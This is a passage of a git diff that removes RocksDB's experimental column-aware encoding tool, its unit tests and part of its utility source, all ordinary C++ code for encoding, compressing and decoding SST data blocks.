-  std::unique_ptr<ColBufEncoder> value_checksum_buf;
-
-  explicit KVPairColBufEncoders(const KVPairColDeclarations &kvp_cd) {
-    for (auto kcd : *kvp_cd.key_col_declarations) {
-      key_col_bufs.emplace_back(
-          std::move(ColBufEncoder::NewColBufEncoder(kcd)));
-    }
-    for (auto vcd : *kvp_cd.value_col_declarations) {
-      value_col_bufs.emplace_back(
-          std::move(ColBufEncoder::NewColBufEncoder(vcd)));
-    }
-    value_checksum_buf.reset(
-        ColBufEncoder::NewColBufEncoder(*kvp_cd.value_checksum_declaration));
-  }
-
-  // Helper function to call Finish()
-  void Finish() {
-    for (auto &col_buf : key_col_bufs) {
-      col_buf->Finish();
-    }
-    for (auto &col_buf : value_col_bufs) {
-      col_buf->Finish();
-    }
-    value_checksum_buf->Finish();
-  }
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/column_aware_encoding_exp.cc b/thirdparty/rocksdb/utilities/column_aware_encoding_exp.cc
deleted file mode 100644
index 9dcd23e..0000000
--- a/thirdparty/rocksdb/utilities/column_aware_encoding_exp.cc
+++ /dev/null
@@ -1,176 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <cstdio>
-#include <cstdlib>
-
-#ifndef ROCKSDB_LITE
-#ifdef GFLAGS
-
-#include <gflags/gflags.h>
-#include <inttypes.h>
-#include <vector>
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_reader.h"
-#include "table/format.h"
-#include "tools/sst_dump_tool_imp.h"
-#include "util/compression.h"
-#include "util/stop_watch.h"
-#include "utilities/col_buf_encoder.h"
-#include "utilities/column_aware_encoding_util.h"
-
-using GFLAGS::ParseCommandLineFlags;
-DEFINE_string(encoded_file, "", "file to store encoded data blocks");
-DEFINE_string(decoded_file, "",
-              "file to store decoded data blocks after encoding");
-DEFINE_string(format, "col", "Output Format. Can be 'row' or 'col'");
-// TODO(jhli): option `col` should be removed and replaced by general
-// column specifications.
-DEFINE_string(index_type, "col", "Index type. Can be 'primary' or 'secondary'");
-DEFINE_string(dump_file, "",
-              "Dump data blocks separated by columns in human-readable format");
-DEFINE_bool(decode, false, "Deocde blocks after they are encoded");
-DEFINE_bool(stat, false,
-            "Print column distribution statistics. Cannot decode in this mode");
-DEFINE_string(compression_type, "kNoCompression",
-              "The compression algorithm used to compress data blocks");
-
-namespace rocksdb {
-
-class ColumnAwareEncodingExp {
- public:
-  static void Run(const std::string& sst_file) {
-    bool decode = FLAGS_decode;
-    if (FLAGS_decoded_file.size() > 0) {
-      decode = true;
-    }
-    if (FLAGS_stat) {
-      decode = false;
-    }
-
-    ColumnAwareEncodingReader reader(sst_file);
-    std::vector<ColDeclaration>* key_col_declarations;
-    std::vector<ColDeclaration>* value_col_declarations;
-    ColDeclaration* value_checksum_declaration;
-    if (FLAGS_index_type == "primary") {
-      ColumnAwareEncodingReader::GetColDeclarationsPrimary(
-          &key_col_declarations, &value_col_declarations,
-          &value_checksum_declaration);
-    } else {
-      ColumnAwareEncodingReader::GetColDeclarationsSecondary(
-          &key_col_declarations, &value_col_declarations,
-          &value_checksum_declaration);
-    }
-    KVPairColDeclarations kvp_cd(key_col_declarations, value_col_declarations,
-                                 value_checksum_declaration);
-
-    if (!FLAGS_dump_file.empty()) {
-      std::vector<KVPairBlock> kv_pair_blocks;
-      reader.GetKVPairsFromDataBlocks(&kv_pair_blocks);
-      reader.DumpDataColumns(FLAGS_dump_file, kvp_cd, kv_pair_blocks);
-      return;
-    }
-    std::unordered_map<std::string, CompressionType> compressions = {
-        {"kNoCompression", CompressionType::kNoCompression},
-        {"kZlibCompression", CompressionType::kZlibCompression},
-        {"kZSTD", CompressionType::kZSTD}};
-
-    // Find Compression
-    CompressionType compression_type = compressions[FLAGS_compression_type];
-    EnvOptions env_options;
-    if (CompressionTypeSupported(compression_type)) {
-      fprintf(stdout, "[%s]\n", FLAGS_compression_type.c_str());
-      unique_ptr<WritableFile> encoded_out_file;
-
-      std::unique_ptr<Env> env(NewMemEnv(Env::Default()));
-      if (!FLAGS_encoded_file.empty()) {
-        env->NewWritableFile(FLAGS_encoded_file, &encoded_out_file,
-                             env_options);
-      }
-
-      std::vector<KVPairBlock> kv_pair_blocks;
-      reader.GetKVPairsFromDataBlocks(&kv_pair_blocks);
-
-      std::vector<std::string> encoded_blocks;
-      StopWatchNano sw(env.get(), true);
-      if (FLAGS_format == "col") {
-        reader.EncodeBlocks(kvp_cd, encoded_out_file.get(), compression_type,
-                            kv_pair_blocks, &encoded_blocks, FLAGS_stat);
-      } else {  // row format
-        reader.EncodeBlocksToRowFormat(encoded_out_file.get(), compression_type,
-                                       kv_pair_blocks, &encoded_blocks);
-      }
-      if (encoded_out_file != nullptr) {
-        uint64_t size = 0;
-        env->GetFileSize(FLAGS_encoded_file, &size);
-        fprintf(stdout, "File size: %" PRIu64 "\n", size);
-      }
-      uint64_t encode_time = sw.ElapsedNanosSafe(false /* reset */);
-      fprintf(stdout, "Encode time: %" PRIu64 "\n", encode_time);
-      if (decode) {
-        unique_ptr<WritableFile> decoded_out_file;
-        if (!FLAGS_decoded_file.empty()) {
-          env->NewWritableFile(FLAGS_decoded_file, &decoded_out_file,
-                               env_options);
-        }
-        sw.Start();
-        if (FLAGS_format == "col") {
-          reader.DecodeBlocks(kvp_cd, decoded_out_file.get(), &encoded_blocks);
-        } else {
-          reader.DecodeBlocksFromRowFormat(decoded_out_file.get(),
-                                           &encoded_blocks);
-        }
-        uint64_t decode_time = sw.ElapsedNanosSafe(true /* reset */);
-        fprintf(stdout, "Decode time: %" PRIu64 "\n", decode_time);
-      }
-    } else {
-      fprintf(stdout, "Unsupported compression type: %s.\n",
-              FLAGS_compression_type.c_str());
-    }
-    delete key_col_declarations;
-    delete value_col_declarations;
-    delete value_checksum_declaration;
-  }
-};
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  int arg_idx = ParseCommandLineFlags(&argc, &argv, true);
-  if (arg_idx >= argc) {
-    fprintf(stdout, "SST filename required.\n");
-    exit(1);
-  }
-  std::string sst_file(argv[arg_idx]);
-  if (FLAGS_format != "row" && FLAGS_format != "col") {
-    fprintf(stderr, "Format must be 'row' or 'col'\n");
-    exit(1);
-  }
-  if (FLAGS_index_type != "primary" && FLAGS_index_type != "secondary") {
-    fprintf(stderr, "Format must be 'primary' or 'secondary'\n");
-    exit(1);
-  }
-  rocksdb::ColumnAwareEncodingExp::Run(sst_file);
-  return 0;
-}
-
-#else
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#endif  // GFLAGS
-#else
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return 1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/column_aware_encoding_test.cc b/thirdparty/rocksdb/utilities/column_aware_encoding_test.cc
deleted file mode 100644
index b99ff56..0000000
--- a/thirdparty/rocksdb/utilities/column_aware_encoding_test.cc
+++ /dev/null
@@ -1,254 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include <vector>
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/col_buf_decoder.h"
-#include "utilities/col_buf_encoder.h"
-
-namespace rocksdb {
-
-class ColumnAwareEncodingTest : public testing::Test {
- public:
-  ColumnAwareEncodingTest() {}
-
-  ~ColumnAwareEncodingTest() {}
-};
-
-class ColumnAwareEncodingTestWithSize
-    : public ColumnAwareEncodingTest,
-      public testing::WithParamInterface<size_t> {
- public:
-  ColumnAwareEncodingTestWithSize() {}
-
-  ~ColumnAwareEncodingTestWithSize() {}
-
-  static std::vector<size_t> GetValues() { return {4, 8}; }
-};
-
-INSTANTIATE_TEST_CASE_P(
-    ColumnAwareEncodingTestWithSize, ColumnAwareEncodingTestWithSize,
-    ::testing::ValuesIn(ColumnAwareEncodingTestWithSize::GetValues()));
-
-TEST_P(ColumnAwareEncodingTestWithSize, NoCompressionEncodeDecode) {
-  size_t col_size = GetParam();
-  std::unique_ptr<ColBufEncoder> col_buf_encoder(
-      new FixedLengthColBufEncoder(col_size, kColNoCompression, false, true));
-  std::string str_buf;
-  uint64_t base_val = 0x0102030405060708;
-  uint64_t val = 0;
-  memcpy(&val, &base_val, col_size);
-  const int row_count = 4;
-  for (int i = 0; i < row_count; ++i) {
-    str_buf.append(reinterpret_cast<char*>(&val), col_size);
-  }
-  const char* str_buf_ptr = str_buf.c_str();
-  for (int i = 0; i < row_count; ++i) {
-    col_buf_encoder->Append(str_buf_ptr);
-  }
-  col_buf_encoder->Finish();
-  const std::string& encoded_data = col_buf_encoder->GetData();
-  // Check correctness of encoded string length
-  ASSERT_EQ(row_count * col_size, encoded_data.size());
-
-  const char* encoded_data_ptr = encoded_data.c_str();
-  uint64_t expected_encoded_val;
-  if (col_size == 8) {
-    expected_encoded_val = port::kLittleEndian ? 0x0807060504030201 : 0x0102030405060708;
-  } else if (col_size == 4) {
-    expected_encoded_val = port::kLittleEndian ? 0x08070605 : 0x0102030400000000;
-  }
-  uint64_t encoded_val = 0;
-  for (int i = 0; i < row_count; ++i) {
-    memcpy(&encoded_val, encoded_data_ptr, col_size);
-    // Check correctness of encoded value
-    ASSERT_EQ(expected_encoded_val, encoded_val);
-    encoded_data_ptr += col_size;
-  }
-
-  std::unique_ptr<ColBufDecoder> col_buf_decoder(
-      new FixedLengthColBufDecoder(col_size, kColNoCompression, false, true));
-  encoded_data_ptr = encoded_data.c_str();
-  encoded_data_ptr += col_buf_decoder->Init(encoded_data_ptr);
-  char* decoded_data = new char[100];
-  char* decoded_data_base = decoded_data;
-  for (int i = 0; i < row_count; ++i) {
-    encoded_data_ptr +=
-        col_buf_decoder->Decode(encoded_data_ptr, &decoded_data);
-  }
-
-  // Check correctness of decoded string length
-  ASSERT_EQ(row_count * col_size, decoded_data - decoded_data_base);
-  decoded_data = decoded_data_base;
-  for (int i = 0; i < row_count; ++i) {
-    uint64_t decoded_val;
-    decoded_val = 0;
-    memcpy(&decoded_val, decoded_data, col_size);
-    // Check correctness of decoded value
-    ASSERT_EQ(val, decoded_val);
-    decoded_data += col_size;
-  }
-  delete[] decoded_data_base;
-}
-
-TEST_P(ColumnAwareEncodingTestWithSize, RleEncodeDecode) {
-  size_t col_size = GetParam();
-  std::unique_ptr<ColBufEncoder> col_buf_encoder(
-      new FixedLengthColBufEncoder(col_size, kColRle, false, true));
-  std::string str_buf;
-  uint64_t base_val = 0x0102030405060708;
-  uint64_t val = 0;
-  memcpy(&val, &base_val, col_size);
-  const int row_count = 4;
-  for (int i = 0; i < row_count; ++i) {
-    str_buf.append(reinterpret_cast<char*>(&val), col_size);
-  }
-  const char* str_buf_ptr = str_buf.c_str();
-  for (int i = 0; i < row_count; ++i) {
-    str_buf_ptr += col_buf_encoder->Append(str_buf_ptr);
-  }
-  col_buf_encoder->Finish();
-  const std::string& encoded_data = col_buf_encoder->GetData();
-  // Check correctness of encoded string length
-  ASSERT_EQ(col_size + 1, encoded_data.size());
-
-  const char* encoded_data_ptr = encoded_data.c_str();
-  uint64_t encoded_val = 0;
-  memcpy(&encoded_val, encoded_data_ptr, col_size);
-  uint64_t expected_encoded_val;
-  if (col_size == 8) {
-    expected_encoded_val = port::kLittleEndian ? 0x0807060504030201 : 0x0102030405060708;
-  } else if (col_size == 4) {
-    expected_encoded_val = port::kLittleEndian ? 0x08070605 : 0x0102030400000000;
-  }
-  // Check correctness of encoded value
-  ASSERT_EQ(expected_encoded_val, encoded_val);
-
-  std::unique_ptr<ColBufDecoder> col_buf_decoder(
-      new FixedLengthColBufDecoder(col_size, kColRle, false, true));
-  char* decoded_data = new char[100];
-  char* decoded_data_base = decoded_data;
-  encoded_data_ptr += col_buf_decoder->Init(encoded_data_ptr);
-  for (int i = 0; i < row_count; ++i) {
-    encoded_data_ptr +=
-        col_buf_decoder->Decode(encoded_data_ptr, &decoded_data);
-  }
-  // Check correctness of decoded string length
-  ASSERT_EQ(decoded_data - decoded_data_base, row_count * col_size);
-  decoded_data = decoded_data_base;
-  for (int i = 0; i < row_count; ++i) {
-    uint64_t decoded_val;
-    decoded_val = 0;
-    memcpy(&decoded_val, decoded_data, col_size);
-    // Check correctness of decoded value
-    ASSERT_EQ(val, decoded_val);
-    decoded_data += col_size;
-  }
-  delete[] decoded_data_base;
-}
-
-TEST_P(ColumnAwareEncodingTestWithSize, DeltaEncodeDecode) {
-  size_t col_size = GetParam();
-  int row_count = 4;
-  std::unique_ptr<ColBufEncoder> col_buf_encoder(
-      new FixedLengthColBufEncoder(col_size, kColDeltaVarint, false, true));
-  std::string str_buf;
-  uint64_t base_val1 = port::kLittleEndian ? 0x0102030405060708 : 0x0807060504030201;
-  uint64_t base_val2 = port::kLittleEndian ? 0x0202030405060708 : 0x0807060504030202;
-  uint64_t val1 = 0, val2 = 0;
-  memcpy(&val1, &base_val1, col_size);
-  memcpy(&val2, &base_val2, col_size);
-  const char* str_buf_ptr;
-  for (int i = 0; i < row_count / 2; ++i) {
-    str_buf = std::string(reinterpret_cast<char*>(&val1), col_size);
-    str_buf_ptr = str_buf.c_str();
-    col_buf_encoder->Append(str_buf_ptr);
-
-    str_buf = std::string(reinterpret_cast<char*>(&val2), col_size);
-    str_buf_ptr = str_buf.c_str();
-    col_buf_encoder->Append(str_buf_ptr);
-  }
-  col_buf_encoder->Finish();
-  const std::string& encoded_data = col_buf_encoder->GetData();
-  // Check encoded string length
-  int varint_len = 0;
-  if (col_size == 8) {
-    varint_len = 9;
-  } else if (col_size == 4) {
-    varint_len = port::kLittleEndian ? 5 : 9;
-  }
-  // Check encoded string length: first value is original one (val - 0), the
-  // coming three are encoded as 1, -1, 1, so they should take 1 byte in varint.
-  ASSERT_EQ(varint_len + 3 * 1, encoded_data.size());
-
-  std::unique_ptr<ColBufDecoder> col_buf_decoder(
-      new FixedLengthColBufDecoder(col_size, kColDeltaVarint, false, true));
-  char* decoded_data = new char[100];
-  char* decoded_data_base = decoded_data;
-  const char* encoded_data_ptr = encoded_data.c_str();
-  encoded_data_ptr += col_buf_decoder->Init(encoded_data_ptr);
-  for (int i = 0; i < row_count; ++i) {
-    encoded_data_ptr +=
-        col_buf_decoder->Decode(encoded_data_ptr, &decoded_data);
-  }
-
-  // Check correctness of decoded string length
-  ASSERT_EQ(row_count * col_size, decoded_data - decoded_data_base);
-  decoded_data = decoded_data_base;
-
-  // Check correctness of decoded data
-  for (int i = 0; i < row_count / 2; ++i) {
-    uint64_t decoded_val = 0;
-    memcpy(&decoded_val, decoded_data, col_size);
-    ASSERT_EQ(val1, decoded_val);
-    decoded_data += col_size;
-    memcpy(&decoded_val, decoded_data, col_size);
-    ASSERT_EQ(val2, decoded_val);
-    decoded_data += col_size;
-  }
-  delete[] decoded_data_base;
-}
-
-TEST_F(ColumnAwareEncodingTest, ChunkBufEncodeDecode) {
-  std::unique_ptr<ColBufEncoder> col_buf_encoder(
-      new VariableChunkColBufEncoder(kColDict));
-  std::string buf("12345678\377\1\0\0\0\0\0\0\0\376", 18);
-  col_buf_encoder->Append(buf.c_str());
-  col_buf_encoder->Finish();
-  const std::string& encoded_data = col_buf_encoder->GetData();
-  const char* str_ptr = encoded_data.c_str();
-
-  std::unique_ptr<ColBufDecoder> col_buf_decoder(
-      new VariableChunkColBufDecoder(kColDict));
-  str_ptr += col_buf_decoder->Init(str_ptr);
-  char* decoded_data = new char[100];
-  char* decoded_data_base = decoded_data;
-  col_buf_decoder->Decode(str_ptr, &decoded_data);
-  for (size_t i = 0; i < buf.size(); ++i) {
-    ASSERT_EQ(buf[i], decoded_data_base[i]);
-  }
-  delete[] decoded_data_base;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-
-#include <cstdio>
-
-int main() {
-  fprintf(stderr,
-          "SKIPPED as column aware encoding experiment is not enabled in "
-          "ROCKSDB_LITE\n");
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/column_aware_encoding_util.cc b/thirdparty/rocksdb/utilities/column_aware_encoding_util.cc
deleted file mode 100644
index c36e422..0000000
--- a/thirdparty/rocksdb/utilities/column_aware_encoding_util.cc
+++ /dev/null
@@ -1,490 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "utilities/column_aware_encoding_util.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <stddef.h>
-#include <stdint.h>
-#include <stdio.h>
-#include <algorithm>
-#include <utility>
-#include <vector>
-#include "include/rocksdb/comparator.h"
-#include "include/rocksdb/slice.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_factory.h"
-#include "table/format.h"
-#include "table/table_reader.h"
-#include "util/coding.h"
-#include "utilities/col_buf_decoder.h"
-#include "utilities/col_buf_encoder.h"
-
-#include "port/port.h"
-
-namespace rocksdb {
-
-ColumnAwareEncodingReader::ColumnAwareEncodingReader(
-    const std::string& file_path)
-    : file_name_(file_path),
-      ioptions_(options_),
-      internal_comparator_(BytewiseComparator()) {
-  InitTableReader(file_name_);
-}
-
-void ColumnAwareEncodingReader::InitTableReader(const std::string& file_path) {
-  std::unique_ptr<RandomAccessFile> file;
-  uint64_t file_size;
-  options_.env->NewRandomAccessFile(file_path, &file, soptions_);
-  options_.env->GetFileSize(file_path, &file_size);
-
-  file_.reset(new RandomAccessFileReader(std::move(file), file_path));
-
-  options_.comparator = &internal_comparator_;
-  options_.table_factory = std::make_shared<BlockBasedTableFactory>();
-
-  std::unique_ptr<TableReader> table_reader;
-  options_.table_factory->NewTableReader(
-      TableReaderOptions(ioptions_, soptions_, internal_comparator_,
-                         /*skip_filters=*/false),
-      std::move(file_), file_size, &table_reader, /*enable_prefetch=*/false);
-
-  table_reader_.reset(dynamic_cast<BlockBasedTable*>(table_reader.release()));
-}
-
-void ColumnAwareEncodingReader::GetKVPairsFromDataBlocks(
-    std::vector<KVPairBlock>* kv_pair_blocks) {
-  table_reader_->GetKVPairsFromDataBlocks(kv_pair_blocks);
-}
-
-void ColumnAwareEncodingReader::DecodeBlocks(
-    const KVPairColDeclarations& kvp_col_declarations, WritableFile* out_file,
-    const std::vector<std::string>* blocks) {
-  char* decoded_content_base = new char[16384];
-  Options options;
-  ImmutableCFOptions ioptions(options);
-  for (auto& block : *blocks) {
-    KVPairColBufDecoders kvp_col_bufs(kvp_col_declarations);
-    auto& key_col_bufs = kvp_col_bufs.key_col_bufs;
-    auto& value_col_bufs = kvp_col_bufs.value_col_bufs;
-    auto& value_checksum_buf = kvp_col_bufs.value_checksum_buf;
-
-    auto& slice_final_with_bit = block;
-    uint32_t format_version = 2;
-    Slice compression_dict;
-    BlockContents contents;
-    const char* content_ptr;
-
-    CompressionType type =
-        (CompressionType)slice_final_with_bit[slice_final_with_bit.size() - 1];
-    if (type != kNoCompression) {
-      UncompressBlockContents(slice_final_with_bit.c_str(),
-                              slice_final_with_bit.size() - 1, &contents,
-                              format_version, compression_dict, ioptions);
-      content_ptr = contents.data.data();
-    } else {
-      content_ptr = slice_final_with_bit.data();
-    }
-
-    size_t num_kv_pairs;
-    const char* header_content_ptr = content_ptr;
-    num_kv_pairs = DecodeFixed64(header_content_ptr);
-
-    header_content_ptr += sizeof(size_t);
-    size_t num_key_columns = key_col_bufs.size();
-    size_t num_value_columns = value_col_bufs.size();
-    std::vector<const char*> key_content_ptr(num_key_columns);
-    std::vector<const char*> value_content_ptr(num_value_columns);
-    const char* checksum_content_ptr;
-
-    size_t num_columns = num_key_columns + num_value_columns;
-    const char* col_content_ptr =
-        header_content_ptr + sizeof(size_t) * num_columns;
-
-    // Read headers
-    for (size_t i = 0; i < num_key_columns; ++i) {
-      key_content_ptr[i] = col_content_ptr;
-      key_content_ptr[i] += key_col_bufs[i]->Init(key_content_ptr[i]);
-      size_t offset;
-      offset = DecodeFixed64(header_content_ptr);
-      header_content_ptr += sizeof(size_t);
-      col_content_ptr += offset;
-    }
-    for (size_t i = 0; i < num_value_columns; ++i) {
-      value_content_ptr[i] = col_content_ptr;
-      value_content_ptr[i] += value_col_bufs[i]->Init(value_content_ptr[i]);
-      size_t offset;
-      offset = DecodeFixed64(header_content_ptr);
-      header_content_ptr += sizeof(size_t);
-      col_content_ptr += offset;
-    }
-    checksum_content_ptr = col_content_ptr;
-    checksum_content_ptr += value_checksum_buf->Init(checksum_content_ptr);
-
-    // Decode block
-    char* decoded_content = decoded_content_base;
-    for (size_t j = 0; j < num_kv_pairs; ++j) {
-      for (size_t i = 0; i < num_key_columns; ++i) {
-        key_content_ptr[i] +=
-            key_col_bufs[i]->Decode(key_content_ptr[i], &decoded_content);
-      }
-      for (size_t i = 0; i < num_value_columns; ++i) {
-        value_content_ptr[i] +=
-            value_col_bufs[i]->Decode(value_content_ptr[i], &decoded_content);
-      }
-      checksum_content_ptr +=
-          value_checksum_buf->Decode(checksum_content_ptr, &decoded_content);
-    }
-
-    size_t offset = decoded_content - decoded_content_base;
-    Slice output_content(decoded_content, offset);
-
-    if (out_file != nullptr) {
-      out_file->Append(output_content);
-    }
-  }
-  delete[] decoded_content_base;
-}
-
-void ColumnAwareEncodingReader::DecodeBlocksFromRowFormat(
-    WritableFile* out_file, const std::vector<std::string>* blocks) {
-  Options options;
-  ImmutableCFOptions ioptions(options);
-  for (auto& block : *blocks) {
-    auto& slice_final_with_bit = block;
-    uint32_t format_version = 2;
-    Slice compression_dict;
-    BlockContents contents;
-    std::string decoded_content;
-
-    CompressionType type =
-        (CompressionType)slice_final_with_bit[slice_final_with_bit.size() - 1];
-    if (type != kNoCompression) {
-      UncompressBlockContents(slice_final_with_bit.c_str(),
-                              slice_final_with_bit.size() - 1, &contents,
-                              format_version, compression_dict, ioptions);
-      decoded_content = std::string(contents.data.data(), contents.data.size());
-    } else {
-      decoded_content = std::move(slice_final_with_bit);
-    }
-
-    if (out_file != nullptr) {
-      out_file->Append(decoded_content);
-    }
-  }
-}
-
-void ColumnAwareEncodingReader::DumpDataColumns(
-    const std::string& filename,
-    const KVPairColDeclarations& kvp_col_declarations,
-    const std::vector<KVPairBlock>& kv_pair_blocks) {
-  KVPairColBufEncoders kvp_col_bufs(kvp_col_declarations);
-  auto& key_col_bufs = kvp_col_bufs.key_col_bufs;
-  auto& value_col_bufs = kvp_col_bufs.value_col_bufs;
-  auto& value_checksum_buf = kvp_col_bufs.value_checksum_buf;
-
-  FILE* fp = fopen(filename.c_str(), "w");
-  size_t block_id = 1;
-  for (auto& kv_pairs : kv_pair_blocks) {
-    fprintf(fp, "---------------- Block: %-4" ROCKSDB_PRIszt " ----------------\n", block_id);
-    for (auto& kv_pair : kv_pairs) {
-      const auto& key = kv_pair.first;
-      const auto& value = kv_pair.second;
-      size_t value_offset = 0;
-
-      const char* key_ptr = key.data();
-      for (auto& buf : key_col_bufs) {
-        size_t col_size = buf->Append(key_ptr);
-        std::string tmp_buf(key_ptr, col_size);
-        Slice col(tmp_buf);
-        fprintf(fp, "%s ", col.ToString(true).c_str());
-        key_ptr += col_size;
-      }
-      fprintf(fp, "|");
-
-      const char* value_ptr = value.data();
-      for (auto& buf : value_col_bufs) {
-        size_t col_size = buf->Append(value_ptr);
-        std::string tmp_buf(value_ptr, col_size);
-        Slice col(tmp_buf);
-        fprintf(fp, " %s", col.ToString(true).c_str());
-        value_ptr += col_size;
-        value_offset += col_size;
-      }
-
-      if (value_offset < value.size()) {
-        size_t col_size = value_checksum_buf->Append(value_ptr);
-        std::string tmp_buf(value_ptr, col_size);
-        Slice col(tmp_buf);
-        fprintf(fp, "|%s", col.ToString(true).c_str());
-      } else {
-        value_checksum_buf->Append(nullptr);
-      }
-      fprintf(fp, "\n");
-    }
-    block_id++;
-  }
-  fclose(fp);
-}
-
-namespace {
-
-void CompressDataBlock(const std::string& output_content, Slice* slice_final,
-                       CompressionType* type, std::string* compressed_output) {
-  CompressionOptions compression_opts;
-  uint32_t format_version = 2;  // hard-coded version
-  Slice compression_dict;
-  *slice_final =
-      CompressBlock(output_content, compression_opts, type, format_version,
-                    compression_dict, compressed_output);
-}
-
-}  // namespace
-
-void ColumnAwareEncodingReader::EncodeBlocksToRowFormat(
-    WritableFile* out_file, CompressionType compression_type,
-    const std::vector<KVPairBlock>& kv_pair_blocks,
-    std::vector<std::string>* blocks) {
-  std::string output_content;
-  for (auto& kv_pairs : kv_pair_blocks) {
-    output_content.clear();
-    std::string last_key;
-    size_t counter = 0;
-    const size_t block_restart_interval = 16;
-    for (auto& kv_pair : kv_pairs) {
-      const auto& key = kv_pair.first;
-      const auto& value = kv_pair.second;
-
-      Slice last_key_piece(last_key);
-      size_t shared = 0;
-      if (counter >= block_restart_interval) {
-        counter = 0;
-      } else {
-        const size_t min_length = std::min(last_key_piece.size(), key.size());
-        while ((shared < min_length) && last_key_piece[shared] == key[shared]) {
-          shared++;
-        }
-      }
-      const size_t non_shared = key.size() - shared;
-      output_content.append(key.c_str() + shared, non_shared);
-      output_content.append(value);
-
-      last_key.resize(shared);
-      last_key.append(key.data() + shared, non_shared);
-      counter++;
-    }
-    Slice slice_final;
-    auto type = compression_type;
-    std::string compressed_output;
-    CompressDataBlock(output_content, &slice_final, &type, &compressed_output);
-
-    if (out_file != nullptr) {
-      out_file->Append(slice_final);
-    }
-
-    // Add a bit in the end for decoding
-    std::string slice_final_with_bit(slice_final.data(), slice_final.size());
-    slice_final_with_bit.append(reinterpret_cast<char*>(&type), 1);
-    blocks->push_back(
-        std::string(slice_final_with_bit.data(), slice_final_with_bit.size()));
-  }
-}
-
-Status ColumnAwareEncodingReader::EncodeBlocks(
-    const KVPairColDeclarations& kvp_col_declarations, WritableFile* out_file,
-    CompressionType compression_type,
-    const std::vector<KVPairBlock>& kv_pair_blocks,
-    std::vector<std::string>* blocks, bool print_column_stat) {
-  std::vector<size_t> key_col_sizes(
-      kvp_col_declarations.key_col_declarations->size(), 0);
-  std::vector<size_t> value_col_sizes(
-      kvp_col_declarations.value_col_declarations->size(), 0);
-  size_t value_checksum_size = 0;
-
-  for (auto& kv_pairs : kv_pair_blocks) {
-    KVPairColBufEncoders kvp_col_bufs(kvp_col_declarations);
-    auto& key_col_bufs = kvp_col_bufs.key_col_bufs;
-    auto& value_col_bufs = kvp_col_bufs.value_col_bufs;
-    auto& value_checksum_buf = kvp_col_bufs.value_checksum_buf;
-
-    size_t num_kv_pairs = 0;
-    for (auto& kv_pair : kv_pairs) {
-      const auto& key = kv_pair.first;
-      const auto& value = kv_pair.second;
-      size_t value_offset = 0;
-      num_kv_pairs++;
-
-      const char* key_ptr = key.data();
-      for (auto& buf : key_col_bufs) {
-        size_t col_size = buf->Append(key_ptr);
-        key_ptr += col_size;
-      }
-
-      const char* value_ptr = value.data();
-      for (auto& buf : value_col_bufs) {
-        size_t col_size = buf->Append(value_ptr);
-        value_ptr += col_size;
-        value_offset += col_size;
-      }
-
-      if (value_offset < value.size()) {
-        value_checksum_buf->Append(value_ptr);
-      } else {
-        value_checksum_buf->Append(nullptr);
-      }
-    }
-
-    kvp_col_bufs.Finish();
-    // Get stats
-    // Compress and write a block
-    if (print_column_stat) {
-      for (size_t i = 0; i < key_col_bufs.size(); ++i) {
-        Slice slice_final;
-        auto type = compression_type;
-        std::string compressed_output;
-        CompressDataBlock(key_col_bufs[i]->GetData(), &slice_final, &type,
-                          &compressed_output);
-        out_file->Append(slice_final);
-        key_col_sizes[i] += slice_final.size();
-      }
-      for (size_t i = 0; i < value_col_bufs.size(); ++i) {
-        Slice slice_final;
-        auto type = compression_type;
-        std::string compressed_output;
-        CompressDataBlock(value_col_bufs[i]->GetData(), &slice_final, &type,
-                          &compressed_output);
-        out_file->Append(slice_final);
-        value_col_sizes[i] += slice_final.size();
-      }
-      Slice slice_final;
-      auto type = compression_type;
-      std::string compressed_output;
-      CompressDataBlock(value_checksum_buf->GetData(), &slice_final, &type,
-                        &compressed_output);
-      out_file->Append(slice_final);
-      value_checksum_size += slice_final.size();
-    } else {
-      std::string output_content;
-      // Write column sizes
-      PutFixed64(&output_content, num_kv_pairs);
-      for (auto& buf : key_col_bufs) {
-        size_t size = buf->GetData().size();
-        PutFixed64(&output_content, size);
-      }
-      for (auto& buf : value_col_bufs) {
-        size_t size = buf->GetData().size();
-        PutFixed64(&output_content, size);
-      }
-      // Write data
-      for (auto& buf : key_col_bufs) {
-        output_content.append(buf->GetData());
-      }
-      for (auto& buf : value_col_bufs) {
-        output_content.append(buf->GetData());
-      }
-      output_content.append(value_checksum_buf->GetData());
-
-      Slice slice_final;
-      auto type = compression_type;
-      std::string compressed_output;
-      CompressDataBlock(output_content, &slice_final, &type,
-                        &compressed_output);
-
-      if (out_file != nullptr) {
-        out_file->Append(slice_final);
-      }
-
-      // Add a bit in the end for decoding
-      std::string slice_final_with_bit(slice_final.data(),
-                                       slice_final.size() + 1);
